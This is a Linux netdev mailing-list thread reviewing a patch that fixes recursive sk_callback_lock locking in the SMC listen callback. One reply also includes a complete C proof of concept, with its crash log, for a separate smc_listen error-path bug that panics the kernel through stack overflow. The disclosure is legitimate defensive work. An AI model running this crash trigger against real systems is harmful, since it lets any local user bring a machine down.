[PATCH net] net/smc: avoid recursive sk_callback_lock in listen data

Netdev List
 help / color / mirror / Atom feed

* [PATCH net] net/smc: avoid recursive sk_callback_lock in listen data_ready
@ 2026-06-17 15:28 Runyu Xiao
  2026-06-18  6:24 ` Mahanta Jambigi
                   ` (3 more replies)
  0 siblings, 4 replies; 9+ messages in thread
From: Runyu Xiao @ 2026-06-17 15:28 UTC (permalink / raw)
  To: D. Wythe, Dust Li, Sidraya Jayagond, Wenjia Zhang,
	David S. Miller, Eric Dumazet, Jakub Kicinski, Paolo Abeni
  Cc: Mahanta Jambigi, Tony Lu, Wen Gu, Simon Horman, Karsten Graul,
	linux-rdma, linux-s390, netdev, linux-kernel, jianhao.xu,
	runyu.xiao, stable

smc_listen() installs smc_clcsock_data_ready() as the underlying TCP
listen socket's sk_data_ready callback.  smc_clcsock_data_ready() then
immediately takes sk_callback_lock before looking up the SMC listener and
queuing smc_tcp_listen_work().

That is unsafe once the TCP listen socket is leaving TCP_LISTEN.  The TCP
close/flush path can run the installed sk_data_ready callback with
sk_callback_lock already held, so entering smc_clcsock_data_ready() again
tries to take the same rwlock recursively in the same thread.  The nvmet
TCP listener had to make the same state check before taking
sk_callback_lock for this reason.

This issue was found by our static analysis tool and then manually
reviewed against the current tree.

The grounded PoC kept the SMC listen callback installation path:

  smc_listen()
  smc_clcsock_replace_cb()
  sk_data_ready = smc_clcsock_data_ready()

It then modeled the close/flush carrier that invokes the installed
sk_data_ready callback while sk_callback_lock is already held.  Lockdep
reported the same-thread recursive acquisition:

  WARNING: possible recursive locking detected
  smc_clcsock_data_ready+0xa/0x4d [vuln_msv]
  smc_close_flush_work+0x1f/0x30 [vuln_msv]
  *** DEADLOCK ***

Return before taking sk_callback_lock when the underlying TCP socket is no
longer in TCP_LISTEN.  In that state there is no listen accept work to
queue for SMC, and avoiding the callback lock mirrors the fix used by the
TCP nvmet listener.

Fixes: 0558226cebee ("net/smc: Fix slab-out-of-bounds issue in fallback")
Cc: stable@vger.kernel.org
Signed-off-by: Runyu Xiao <runyu.xiao@seu.edu.cn>
---
 net/smc/af_smc.c | 3 +++
 1 file changed, 3 insertions(+)

diff --git a/net/smc/af_smc.c b/net/smc/af_smc.c
index 6421c2e1c84d..1af4e3c333ff 100644
--- a/net/smc/af_smc.c
+++ b/net/smc/af_smc.c
@@ -2631,6 +2631,9 @@ static void smc_clcsock_data_ready(struct sock *listen_clcsock)
 {
 	struct smc_sock *lsmc;

+	if (READ_ONCE(listen_clcsock->sk_state) != TCP_LISTEN)
+		return;
+
 	read_lock_bh(&listen_clcsock->sk_callback_lock);
 	lsmc = smc_clcsock_user_data(listen_clcsock);
 	if (!lsmc)
-- 
2.34.1

^ permalink raw reply related	[flat|nested] 9+ messages in thread

* Re: [PATCH net] net/smc: avoid recursive sk_callback_lock in listen data_ready
  2026-06-17 15:28 [PATCH net] net/smc: avoid recursive sk_callback_lock in listen data_ready Runyu Xiao
@ 2026-06-18  6:24 ` Mahanta Jambigi
  2026-06-18 14:16   ` Runyu Xiao
  2026-06-19  5:48 ` [PATCH net v2] " Runyu Xiao
                   ` (2 subsequent siblings)
  3 siblings, 1 reply; 9+ messages in thread
From: Mahanta Jambigi @ 2026-06-18  6:24 UTC (permalink / raw)
  To: Runyu Xiao, D. Wythe, Dust Li, Sidraya Jayagond, Wenjia Zhang,
	David S. Miller, Eric Dumazet, Jakub Kicinski, Paolo Abeni
  Cc: Tony Lu, Wen Gu, Simon Horman, Karsten Graul, linux-rdma,
	linux-s390, netdev, linux-kernel, jianhao.xu, stable



On 17/06/26 8:58 pm, Runyu Xiao wrote:
> smc_listen() installs smc_clcsock_data_ready() as the underlying TCP
> listen socket's sk_data_ready callback.  smc_clcsock_data_ready() then
> immediately takes sk_callback_lock before looking up the SMC listener and
> queuing smc_tcp_listen_work().
> 
> That is unsafe once the TCP listen socket is leaving TCP_LISTEN.  The TCP
> close/flush path can run the installed sk_data_ready callback with
> sk_callback_lock already held, so entering smc_clcsock_data_ready() again
> tries to take the same rwlock recursively in the same thread.  The nvmet

Could you provide me the exact call stack showing recursive lock? Also
help me with the nvmet commit details.

> TCP listener had to make the same state check before taking
> sk_callback_lock for this reason.
> 
> This issue was found by our static analysis tool and then manually
> reviewed against the current tree.
> 
> The grounded PoC kept the SMC listen callback installation path:
> 
>   smc_listen()
>   smc_clcsock_replace_cb()
>   sk_data_ready = smc_clcsock_data_ready()
> 
> It then modeled the close/flush carrier that invokes the installed
> sk_data_ready callback while sk_callback_lock is already held.  Lockdep
> reported the same-thread recursive acquisition:
> 
>   WARNING: possible recursive locking detected
>   smc_clcsock_data_ready+0xa/0x4d [vuln_msv]
>   smc_close_flush_work+0x1f/0x30 [vuln_msv]
>   *** DEADLOCK ***
> 
> Return before taking sk_callback_lock when the underlying TCP socket is no
> longer in TCP_LISTEN.  In that state there is no listen accept work to
> queue for SMC, and avoiding the callback lock mirrors the fix used by the
> TCP nvmet listener.
> 
> Fixes: 0558226cebee ("net/smc: Fix slab-out-of-bounds issue in fallback")
> Cc: stable@vger.kernel.org
> Signed-off-by: Runyu Xiao <runyu.xiao@seu.edu.cn>
> ---
>  net/smc/af_smc.c | 3 +++
>  1 file changed, 3 insertions(+)
> 
> diff --git a/net/smc/af_smc.c b/net/smc/af_smc.c
> index 6421c2e1c84d..1af4e3c333ff 100644
> --- a/net/smc/af_smc.c
> +++ b/net/smc/af_smc.c
> @@ -2631,6 +2631,9 @@ static void smc_clcsock_data_ready(struct sock *listen_clcsock)
>  {
>  	struct smc_sock *lsmc;
>  
> +	if (READ_ONCE(listen_clcsock->sk_state) != TCP_LISTEN)

Is *TCP_LISTEN* check sufficient? What about *TCP_SYN_RECV* or
*TCP_ESTABLISHED*?

> +		return;
> +
>  	read_lock_bh(&listen_clcsock->sk_callback_lock);
>  	lsmc = smc_clcsock_user_data(listen_clcsock);
>  	if (!lsmc)


^ permalink raw reply	[flat|nested] 9+ messages in thread

* Re: [PATCH net] net/smc: avoid recursive sk_callback_lock in listen data_ready
  2026-06-18  6:24 ` Mahanta Jambigi
@ 2026-06-18 14:16   ` Runyu Xiao
  2026-06-19  5:36     ` Mahanta Jambigi
  0 siblings, 1 reply; 9+ messages in thread
From: Runyu Xiao @ 2026-06-18 14:16 UTC (permalink / raw)
  To: Mahanta Jambigi, D. Wythe, Dust Li, Sidraya Jayagond,
	Wenjia Zhang, David S. Miller, Eric Dumazet, Jakub Kicinski,
	Paolo Abeni
  Cc: Tony Lu, Wen Gu, Simon Horman, Karsten Graul, linux-rdma,
	linux-s390, netdev, linux-kernel, jianhao.xu, runyu.xiao

Hi,

Thanks for taking a look.

The exact Lockdep stack I have is from the grounded reproducer, not from
a production SMC setup.  The reproducer keeps the same callback shape:
the close/flush side holds sk_callback_lock and invokes the installed
sk_data_ready callback, which re-enters smc_clcsock_data_ready() and tries
to take sk_callback_lock again.

The relevant Lockdep report is:

  WARNING: possible recursive locking detected
  kworker/u4:3/39 is trying to acquire lock:
    (sk_callback_lock) at smc_clcsock_data_ready+0xa/0x4d

  but task is already holding lock:
    (sk_callback_lock) at smc_close_flush_work+0xc/0x30

  Possible unsafe locking scenario:

        CPU0
        ----
        lock(sk_callback_lock);
        lock(sk_callback_lock);

  *** DEADLOCK ***

  Workqueue: smc_close_wq smc_close_flush_work

  Call Trace:
    dump_stack_lvl
    __lock_acquire
    lock_acquire
    _raw_read_lock_bh
    smc_clcsock_data_ready+0xa/0x4d
    smc_close_flush_work+0x1f/0x30
    process_one_work
    worker_thread
    kthread
    ret_from_fork

The nvmet change I referred to is:

  2fa8961d3a6a ("nvmet-tcp: fixup hang in nvmet_tcp_listen_data_ready()")

The stable/backport patch I originally used as the reference is:

  1c90f930e7b4 ("nvmet-tcp: fixup hang in nvmet_tcp_listen_data_ready()")

Its commit message says that when the socket is closed while in
TCP_LISTEN, the flush callback can call nvmet_tcp_listen_data_ready()
with sk_callback_lock already held, so nvmet moved the TCP_LISTEN check
before taking sk_callback_lock.

For the TCP_LISTEN check: my reasoning was that smc_clcsock_data_ready()
is installed by smc_listen() on the underlying TCP listen socket and only
queues smc_tcp_listen_work() for the SMC listen/accept path.  Once that
underlying socket is no longer in TCP_LISTEN, there should be no SMC
listen accept work to queue from this callback.  TCP_SYN_RECV and
TCP_ESTABLISHED are not listen-socket states for this callback path, so I
did not intend the callback to queue listen work for those states.

That said, if SMC expects smc_clcsock_data_ready() to handle a non-LISTEN
state during fallback or another transition, then the proposed check is
too strict and I should rework the fix.

Thanks,
Runyu

^ permalink raw reply	[flat|nested] 9+ messages in thread

* Re: [PATCH net] net/smc: avoid recursive sk_callback_lock in listen data_ready
  2026-06-18 14:16   ` Runyu Xiao
@ 2026-06-19  5:36     ` Mahanta Jambigi
  0 siblings, 0 replies; 9+ messages in thread
From: Mahanta Jambigi @ 2026-06-19  5:36 UTC (permalink / raw)
  To: Runyu Xiao, D. Wythe, Dust Li, Sidraya Jayagond, Wenjia Zhang,
	David S. Miller, Eric Dumazet, Jakub Kicinski, Paolo Abeni
  Cc: Tony Lu, Wen Gu, Simon Horman, Karsten Graul, linux-rdma,
	linux-s390, netdev, linux-kernel, jianhao.xu



On 18/06/26 7:46 pm, Runyu Xiao wrote:
> Hi,
> 
> Thanks for taking a look.
> 
> The exact Lockdep stack I have is from the grounded reproducer, not from
> a production SMC setup.  The reproducer keeps the same callback shape:
> the close/flush side holds sk_callback_lock and invokes the installed
> sk_data_ready callback, which re-enters smc_clcsock_data_ready() and tries
> to take sk_callback_lock again.
> 
> The relevant Lockdep report is:
> 
>   WARNING: possible recursive locking detected
>   kworker/u4:3/39 is trying to acquire lock:
>     (sk_callback_lock) at smc_clcsock_data_ready+0xa/0x4d
> 
>   but task is already holding lock:
>     (sk_callback_lock) at smc_close_flush_work+0xc/0x30
> 
>   Possible unsafe locking scenario:
> 
>         CPU0
>         ----
>         lock(sk_callback_lock);
>         lock(sk_callback_lock);
> 
>   *** DEADLOCK ***
> 
>   Workqueue: smc_close_wq smc_close_flush_work
> 
>   Call Trace:
>     dump_stack_lvl
>     __lock_acquire
>     lock_acquire
>     _raw_read_lock_bh
>     smc_clcsock_data_ready+0xa/0x4d
>     smc_close_flush_work+0x1f/0x30
>     process_one_work
>     worker_thread
>     kthread
>     ret_from_fork

Thank you for addressing the feedback. My suggestion would be to reply
to the original email thread where the review comments were given, so
that the maintainers can follow the conversation.

https://www.kernel.org/doc/html/latest/process/submitting-patches.html#respond-to-review-comments

Please include above call stack in your next version.

> 
> The nvmet change I referred to is:
> 
>   2fa8961d3a6a ("nvmet-tcp: fixup hang in nvmet_tcp_listen_data_ready()")

Please include this info in your next version.

> 
> The stable/backport patch I originally used as the reference is:
> 
>   1c90f930e7b4 ("nvmet-tcp: fixup hang in nvmet_tcp_listen_data_ready()")
> 
> Its commit message says that when the socket is closed while in
> TCP_LISTEN, the flush callback can call nvmet_tcp_listen_data_ready()
> with sk_callback_lock already held, so nvmet moved the TCP_LISTEN check
> before taking sk_callback_lock.
> 
> For the TCP_LISTEN check: my reasoning was that smc_clcsock_data_ready()
> is installed by smc_listen() on the underlying TCP listen socket and only
> queues smc_tcp_listen_work() for the SMC listen/accept path.  Once that
> underlying socket is no longer in TCP_LISTEN, there should be no SMC
> listen accept work to queue from this callback.  TCP_SYN_RECV and
> TCP_ESTABLISHED are not listen-socket states for this callback path, so I
> did not intend the callback to queue listen work for those states.

I understand. Please include this info in your next version.

> 
> That said, if SMC expects smc_clcsock_data_ready() to handle a non-LISTEN
> state during fallback or another transition, then the proposed check is
> too strict and I should rework the fix.
> 
> Thanks,
> Runyu


^ permalink raw reply	[flat|nested] 9+ messages in thread

* [PATCH net v2] net/smc: avoid recursive sk_callback_lock in listen data_ready
  2026-06-17 15:28 [PATCH net] net/smc: avoid recursive sk_callback_lock in listen data_ready Runyu Xiao
  2026-06-18  6:24 ` Mahanta Jambigi
@ 2026-06-19  5:48 ` Runyu Xiao
  2026-06-23 10:38   ` XIAO WU
  2026-06-19  6:35 ` [PATCH net] " Dust Li
  2026-06-25  8:32 ` Sidraya Jayagond
  3 siblings, 1 reply; 9+ messages in thread
From: Runyu Xiao @ 2026-06-19  5:48 UTC (permalink / raw)
  To: D. Wythe, Dust Li, Sidraya Jayagond, Wenjia Zhang,
	David S. Miller, Eric Dumazet, Jakub Kicinski, Paolo Abeni
  Cc: Mahanta Jambigi, Tony Lu, Wen Gu, Simon Horman, Karsten Graul,
	linux-rdma, linux-s390, netdev, linux-kernel, jianhao.xu,
	runyu.xiao, stable

smc_listen() installs smc_clcsock_data_ready() as the underlying TCP
listen socket's sk_data_ready callback.  The callback takes
sk_callback_lock before looking up the SMC listener and queuing
smc_tcp_listen_work().

This can recurse when the underlying TCP listen socket is being closed.
The close/flush path may invoke the installed sk_data_ready callback with
sk_callback_lock already held, so smc_clcsock_data_ready() tries to take
the same rwlock again in the same thread.

This issue was found by our static analysis tool and then manually
reviewed against the current tree.  The reproducer keeps the SMC listen
callback installation path:

  smc_listen()
  smc_clcsock_replace_cb()
  sk_data_ready = smc_clcsock_data_ready()

It then models the close/flush carrier that invokes the installed
sk_data_ready callback while sk_callback_lock is already held.  Lockdep
reports the same-thread recursive acquisition:

  WARNING: possible recursive locking detected
  kworker/u4:3/39 is trying to acquire lock:
    (sk_callback_lock) at smc_clcsock_data_ready+0xa/0x4d

  but task is already holding lock:
    (sk_callback_lock) at smc_close_flush_work+0xc/0x30

  Possible unsafe locking scenario:

        CPU0
        ----
        lock(sk_callback_lock);
        lock(sk_callback_lock);

  *** DEADLOCK ***

  Workqueue: smc_close_wq smc_close_flush_work

  Call Trace:
    dump_stack_lvl
    __lock_acquire
    lock_acquire
    _raw_read_lock_bh
    smc_clcsock_data_ready
    smc_close_flush_work
    process_one_work
    worker_thread
    kthread
    ret_from_fork

The same pattern was fixed for nvmet TCP by checking TCP_LISTEN before
taking sk_callback_lock:

  commit 2fa8961d3a6a ("nvmet-tcp: fixup hang in
  nvmet_tcp_listen_data_ready()")

Do the same for SMC.  smc_clcsock_data_ready() is installed by
smc_listen() on the underlying TCP listen socket and only queues
smc_tcp_listen_work() for the SMC listen/accept path.  Once that socket is
no longer in TCP_LISTEN, there is no listen accept work to queue from this
callback, and avoiding sk_callback_lock also avoids the recursive locking
path.

Fixes: 0558226cebee ("net/smc: Fix slab-out-of-bounds issue in fallback")
Cc: stable@vger.kernel.org
Signed-off-by: Runyu Xiao <runyu.xiao@seu.edu.cn>
---
v2:
- Include the fuller Lockdep stack from the grounded reproducer.
- Add the related nvmet TCP fix reference.
- Explain why the TCP_LISTEN check is valid for the SMC listen callback.

 net/smc/af_smc.c | 3 +++
 1 file changed, 3 insertions(+)

diff --git a/net/smc/af_smc.c b/net/smc/af_smc.c
index 6421c2e1c84d..1af4e3c333ff 100644
--- a/net/smc/af_smc.c
+++ b/net/smc/af_smc.c
@@ -2631,6 +2631,9 @@ static void smc_clcsock_data_ready(struct sock *listen_clcsock)
 {
 	struct smc_sock *lsmc;

+	if (READ_ONCE(listen_clcsock->sk_state) != TCP_LISTEN)
+		return;
+
 	read_lock_bh(&listen_clcsock->sk_callback_lock);
 	lsmc = smc_clcsock_user_data(listen_clcsock);
 	if (!lsmc)
-- 
2.34.1

^ permalink raw reply related	[flat|nested] 9+ messages in thread

* Re: [PATCH net] net/smc: avoid recursive sk_callback_lock in listen data_ready
  2026-06-17 15:28 [PATCH net] net/smc: avoid recursive sk_callback_lock in listen data_ready Runyu Xiao
  2026-06-18  6:24 ` Mahanta Jambigi
  2026-06-19  5:48 ` [PATCH net v2] " Runyu Xiao
@ 2026-06-19  6:35 ` Dust Li
  2026-06-25  8:32 ` Sidraya Jayagond
  3 siblings, 0 replies; 9+ messages in thread
From: Dust Li @ 2026-06-19  6:35 UTC (permalink / raw)
  To: Runyu Xiao, D. Wythe, Sidraya Jayagond, Wenjia Zhang,
	David S. Miller, Eric Dumazet, Jakub Kicinski, Paolo Abeni
  Cc: Mahanta Jambigi, Tony Lu, Wen Gu, Simon Horman, Karsten Graul,
	linux-rdma, linux-s390, netdev, linux-kernel, jianhao.xu, stable

On 2026-06-17 23:28:55, Runyu Xiao wrote:
>smc_listen() installs smc_clcsock_data_ready() as the underlying TCP
>listen socket's sk_data_ready callback.  smc_clcsock_data_ready() then
>immediately takes sk_callback_lock before looking up the SMC listener and
>queuing smc_tcp_listen_work().
>
>That is unsafe once the TCP listen socket is leaving TCP_LISTEN.  The TCP
>close/flush path can run the installed sk_data_ready callback with
>sk_callback_lock already held, so entering smc_clcsock_data_ready() again
>tries to take the same rwlock recursively in the same thread.  The nvmet
>TCP listener had to make the same state check before taking
>sk_callback_lock for this reason.
>
>This issue was found by our static analysis tool and then manually
>reviewed against the current tree.
>
>The grounded PoC kept the SMC listen callback installation path:
>
>  smc_listen()
>  smc_clcsock_replace_cb()
>  sk_data_ready = smc_clcsock_data_ready()
>
>It then modeled the close/flush carrier that invokes the installed
>sk_data_ready callback while sk_callback_lock is already held.  Lockdep
>reported the same-thread recursive acquisition:
>
>  WARNING: possible recursive locking detected
>  smc_clcsock_data_ready+0xa/0x4d [vuln_msv]
>  smc_close_flush_work+0x1f/0x30 [vuln_msv]
>  *** DEADLOCK ***
>
>Return before taking sk_callback_lock when the underlying TCP socket is no
>longer in TCP_LISTEN.  In that state there is no listen accept work to
>queue for SMC, and avoiding the callback lock mirrors the fix used by the
>TCP nvmet listener.

Hi Runyu,

I noticed the lockdep splat comes from your own kernel module
([vuln_msv]) that models the condition, rather than from a real
TCP code path.

Could you point me to the specific mainline TCP code path that calls
sk_data_ready() while holding sk_callback_lock? If such a path
exists, I'm happy to take this patch. But if this is based solely on
static analysis without a confirmed real call chain, I'd prefer to
focus our review bandwidth on issues that have demonstrated impact.

Thanks,
Dust


^ permalink raw reply	[flat|nested] 9+ messages in thread

* Re: [PATCH net v2] net/smc: avoid recursive sk_callback_lock in listen data_ready
  2026-06-19  5:48 ` [PATCH net v2] " Runyu Xiao
@ 2026-06-23 10:38   ` XIAO WU
  2026-06-24 10:37     ` Runyu Xiao
  0 siblings, 1 reply; 9+ messages in thread
From: XIAO WU @ 2026-06-23 10:38 UTC (permalink / raw)
  To: Runyu Xiao, D. Wythe, Dust Li, Sidraya Jayagond, Wenjia Zhang,
	David S. Miller, Eric Dumazet, Jakub Kicinski, Paolo Abeni
  Cc: Mahanta Jambigi, Tony Lu, Wen Gu, Simon Horman, Karsten Graul,
	linux-rdma, linux-s390, netdev, linux-kernel, jianhao.xu, stable

Hi Runyu,

Thanks for this patch.

 > diff --git a/net/smc/af_smc.c b/net/smc/af_smc.c
 > index 6421c2e1c84d..1af4e3c333ff 100644
 > --- a/net/smc/af_smc.c
 > +++ b/net/smc/af_smc.c
 > @@ -2631,6 +2631,9 @@ static void smc_clcsock_data_ready(struct sock 
*listen_clcsock)
 >  {
 >      struct smc_sock *lsmc;
 >
 > +    if (READ_ONCE(listen_clcsock->sk_state) != TCP_LISTEN)
 > +        return;
 > +
 >      read_lock_bh(&listen_clcsock->sk_callback_lock);
 >      lsmc = smc_clcsock_user_data(listen_clcsock);

The TCP_LISTEN check before taking sk_callback_lock looks correct and
mirrors the same pattern from nvmet TCP.

Sashiko AI review also looked at this patch and flagged a separate
pre-existing issue nearby — the error path in smc_listen() does not
restore icsk_af_ops when kernel_listen() fails:

https://sashiko.dev/#/patchset/20260617152855.1039151-1-runyu.xiao@seu.edu.cn

The relevant code in smc_listen() (net/smc/af_smc.c, lines ~2687-2704):

         smc->ori_af_ops = inet_csk(smc->clcsock->sk)->icsk_af_ops;

         smc->af_ops = *smc->ori_af_ops;
         smc->af_ops.syn_recv_sock = smc_tcp_syn_recv_sock;

         inet_csk(smc->clcsock->sk)->icsk_af_ops = &smc->af_ops;

         if (smc->limit_smc_hs)
                 tcp_sk(smc->clcsock->sk)->smc_hs_congested = 
smc_hs_congested;

         rc = kernel_listen(smc->clcsock, backlog);
         if (rc) {
write_lock_bh(&smc->clcsock->sk->sk_callback_lock);
smc_clcsock_restore_cb(&smc->clcsock->sk->sk_data_ready,
  &smc->clcsk_data_ready);
                 rcu_assign_sk_user_data(smc->clcsock->sk, NULL);
write_unlock_bh(&smc->clcsock->sk->sk_callback_lock);
                 goto out;
         }

The error path restores sk_data_ready and sk_user_data but leaves
icsk_af_ops pointing to &smc->af_ops (whose syn_recv_sock is already
set to smc_tcp_syn_recv_sock).  I verified this in a QEMU VM and can
confirm it triggers a real kernel stack overflow.

=== Reproduction ===

Kernel: 7.1.0-rc7-gfa471042f07a #1 SMP PREEMPT_DYNAMIC x86_64
Config: ci-qemu-upstream.config (KASAN=y, CONFIG_SMC=y, DEBUG_LIST=y)
QEMU: qemu-system-x86_64 -m 2G -smp 2

Trigger sequence:
   1. SMC socket A: setsockopt(SO_REUSEADDR), bind to port P
      → clcsock gets SO_REUSEADDR via smc_bind() copy
   2. TCP socket C: setsockopt(SO_REUSEADDR), bind + listen on port P
      → Both non-TCP_LISTEN at bind time → bind OK
      → C enters TCP_LISTEN after its listen()
   3. listen(A) on SMC → kernel_listen() fails with EADDRINUSE
      → icsk_af_ops NOT restored → clcsock points to wrapper
   4. Close TCP C (free port), listen(A) again → succeeds
      → ori_af_ops now points to wrapper with syn_recv_sock = 
smc_tcp_syn_recv_sock
   5. TCP connect() to port P → smc_tcp_syn_recv_sock calls itself
      → infinite recursion → IRQ stack guard page hit → kernel panic

=== Full PoC ===

Compile with: gcc -o poc poc.c -static

// PoC: Stack overflow via corrupted icsk_af_ops in smc_listen error path
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <netinet/in.h>
#include <arpa/inet.h>

#ifndef PF_SMC
#define PF_SMC 43
#endif
#ifndef SMCPROTO_SMC
#define SMCPROTO_SMC 0
#endif

int main(void)
{
     int smc_a, tcp_c, client;
     struct sockaddr_in addr;
     pid_t child;
     int status, ret;
     socklen_t len;
     int val;

     printf("=== SMC listen error path -> stack overflow PoC ===\n\n");

     /* Step 1: SMC socket A with SO_REUSEADDR, bind to any free port */
     printf("[1] Create SMC socket A with SO_REUSEADDR\n");
     smc_a = socket(PF_SMC, SOCK_STREAM, 0);
     if (smc_a < 0) { perror("smc socket"); return 1; }
     val = 1;
     setsockopt(smc_a, SOL_SOCKET, SO_REUSEADDR, &val, sizeof(val));

     memset(&addr, 0, sizeof(addr));
     addr.sin_family = AF_INET;
     addr.sin_addr.s_addr = htonl(INADDR_ANY);
     addr.sin_port = 0;
     if (bind(smc_a, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
         perror("bind smc_a"); close(smc_a); return 1;
     }
     len = sizeof(addr);
     if (getsockname(smc_a, (struct sockaddr *)&addr, &len) < 0) {
         perror("getsockname"); close(smc_a); return 1;
     }
     int port = ntohs(addr.sin_port);
     printf("  SMC A bound to port %d\n", port);

     /* Step 2: TCP socket C with SO_REUSEADDR, bind+listen on same port */
     printf("[2] TCP C with SO_REUSEADDR, bind+listen on port %d\n", port);
     tcp_c = socket(AF_INET, SOCK_STREAM, 0);
     val = 1;
     setsockopt(tcp_c, SOL_SOCKET, SO_REUSEADDR, &val, sizeof(val));
     memset(&addr, 0, sizeof(addr));
     addr.sin_family = AF_INET;
     addr.sin_addr.s_addr = htonl(INADDR_ANY);
     addr.sin_port = htons(port);
     if (bind(tcp_c, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
         perror("bind tcp_c"); close(tcp_c); close(smc_a); return 1;
     }
     if (listen(tcp_c, 5) < 0) {
         perror("listen tcp_c"); close(tcp_c); close(smc_a); return 1;
     }
     printf("  TCP C listening on port %d\n", port);

     /* Step 3: listen(A) should FAIL → icsk_af_ops NOT restored */
     printf("[3] listen(SMC A) — expect failure... ");
     fflush(stdout);
     ret = listen(smc_a, 5);
     if (ret == 0) {
         printf("succeeded! Unexpected.\n");
         close(tcp_c); close(smc_a);
         return 1;
     }
     printf("failed: %s\n", strerror(errno));

     /* Step 4: Close TCP C to free the port */
     printf("[4] Close TCP C to free port %d\n", port);
     close(tcp_c);
     sleep(1);

     /* Step 5: listen(A) again → succeeds but ori_af_ops is 
self-referential */
     printf("[5] listen(SMC A) again... ");
     fflush(stdout);
     ret = listen(smc_a, 5);
     if (ret < 0) {
         printf("failed: %s, retrying...\n", strerror(errno));
         sleep(2);
         ret = listen(smc_a, 5);
     }
     if (ret < 0) {
         perror("retry"); close(smc_a); return 1;
     }
     printf("succeeded! ori_af_ops->syn_recv_sock == 
smc_tcp_syn_recv_sock\n");

     /* Step 6: TCP connect → smc_tcp_syn_recv_sock recursion → STACK 
OVERFLOW */
     printf("[6] TCP connect → triggers infinite recursion...\n");
     fflush(stdout);

     child = fork();
     if (child == 0) {
         client = socket(AF_INET, SOCK_STREAM, 0);
         if (client < 0) exit(1);
         memset(&addr, 0, sizeof(addr));
         addr.sin_family = AF_INET;
         addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
         addr.sin_port = htons(port);
         if (connect(client, (struct sockaddr*)&addr, sizeof(addr)) < 0) {
             perror("connect");
             exit(1);
         }
         sleep(3);
         close(client);
         exit(0);
     }

     printf("Waiting for crash...\n");
     sleep(5);
     if (waitpid(child, &status, WNOHANG) == 0) {
         printf("Child still alive — check dmesg\n");
         kill(child, SIGKILL);
         waitpid(child, NULL, 0);
     }
     close(smc_a);
     return 0;
}

=== Crash Log ===

Linux syzkaller 7.1.0-rc7-gfa471042f07a #1 SMP PREEMPT_DYNAMIC x86_64
(CONFIG_KASAN=y, CONFIG_SMC=y, CONFIG_DEBUG_LIST=y)

[ 1453.562682][    C0] BUG: IRQ stack guard page was hit at 
ffffc8ffffffff98 (stack is ffffc90000000000..ffffc90000008000)
[ 1453.562712][    C0] Oops: stack guard page: 0000 [#1] SMP KASAN NOPTI
[ 1453.562733][    C0] CPU: 0 UID: 0 PID: 10840 Comm: poc Not tainted 
7.1.0-rc7-gfa471042f07a #1 PREEMPT(full)
[ 1453.562756][    C0] Hardware name: QEMU Standard PC (Q35 + ICH9, 
2009), BIOS 1.16.3-debian-1.16.3-2 04/01/2014
[ 1453.562767][    C0] RIP: 0010:__lock_acquire+0x417/0x2730
[ 1453.562965][    C0] Call Trace:
[ 1453.562970][    C0]  <IRQ>
[ 1453.562980][    C0]  lock_acquire+0x1ae/0x360
[ 1453.562995][    C0]  ? smc_tcp_syn_recv_sock+0xab/0xb10
[ 1453.563031][    C0]  smc_tcp_syn_recv_sock+0xbf/0xb10
[ 1453.563051][    C0]  ? smc_tcp_syn_recv_sock+0xab/0xb10
[ 1453.563073][    C0]  ? __pfx_smc_tcp_syn_recv_sock+0x10/0x10
[ 1453.563114][    C0]  smc_tcp_syn_recv_sock+0x435/0xb10
[ 1453.563158][    C0]  smc_tcp_syn_recv_sock+0x435/0xb10
[ 1453.563200][    C0]  smc_tcp_syn_recv_sock+0x435/0xb10
[ 1453.563244][    C0]  smc_tcp_syn_recv_sock+0x435/0xb10
                         [... 15+ recursive frames ...]
[ 1453.564373][    C0]  smc_tcp_syn_recv_sock+0x435/0xb10
[ 1453.564413][    C0]  smc_tcp_syn_recv_sock+0x435/0xb10
[ 1453.577027][    C0] RIP: 0033:0x423574
[ 1453.577319][    C0] Kernel panic - not syncing: Fatal exception in 
interrupt

The infinite recursion is visible in the repeated
smc_tcp_syn_recv_sock+0x435/0xb10 frames — each iteration calls
ori_af_ops->syn_recv_sock(), which is itself, pushing a new frame
until the IRQ stack guard page is hit.

Thanks,
Xiao



^ permalink raw reply	[flat|nested] 9+ messages in thread

* Re: [PATCH net v2] net/smc: avoid recursive sk_callback_lock in listen data_ready
  2026-06-23 10:38   ` XIAO WU
@ 2026-06-24 10:37     ` Runyu Xiao
  0 siblings, 0 replies; 9+ messages in thread
From: Runyu Xiao @ 2026-06-24 10:37 UTC (permalink / raw)
  To: XIAO WU
  Cc: D. Wythe, Dust Li, Sidraya Jayagond, Wenjia Zhang,
	David S. Miller, Eric Dumazet, Jakub Kicinski, Paolo Abeni,
	Mahanta Jambigi, Tony Lu, Wen Gu, Simon Horman, Karsten Graul,
	linux-rdma, linux-s390, netdev, linux-kernel, jianhao.xu

Hi Xiao,

&gt; the error path in smc_listen() does not restore icsk_af_ops when
&gt; kernel_listen() fails

Thanks, this looks like a real error-path bug. I will prepare it as a
separate fix for smc_listen() rather than folding it into this
sk_callback_lock patch.

Runyu


^ permalink raw reply	[flat|nested] 9+ messages in thread

* Re: [PATCH net] net/smc: avoid recursive sk_callback_lock in listen data_ready
  2026-06-17 15:28 [PATCH net] net/smc: avoid recursive sk_callback_lock in listen data_ready Runyu Xiao
                   ` (2 preceding siblings ...)
  2026-06-19  6:35 ` [PATCH net] " Dust Li
@ 2026-06-25  8:32 ` Sidraya Jayagond
  3 siblings, 0 replies; 9+ messages in thread
From: Sidraya Jayagond @ 2026-06-25  8:32 UTC (permalink / raw)
  To: Runyu Xiao, D. Wythe, Dust Li, Wenjia Zhang, David S. Miller,
	Eric Dumazet, Jakub Kicinski, Paolo Abeni
  Cc: Mahanta Jambigi, Tony Lu, Wen Gu, Simon Horman, Karsten Graul,
	linux-rdma, linux-s390, netdev, linux-kernel, jianhao.xu, stable



On 17/06/26 8:58 pm, Runyu Xiao wrote:
> smc_listen() installs smc_clcsock_data_ready() as the underlying TCP
> listen socket's sk_data_ready callback.  smc_clcsock_data_ready() then
> immediately takes sk_callback_lock before looking up the SMC listener and
> queuing smc_tcp_listen_work().
> 
> That is unsafe once the TCP listen socket is leaving TCP_LISTEN.  The TCP
> close/flush path can run the installed sk_data_ready callback with
> sk_callback_lock already held, so entering smc_clcsock_data_ready() again
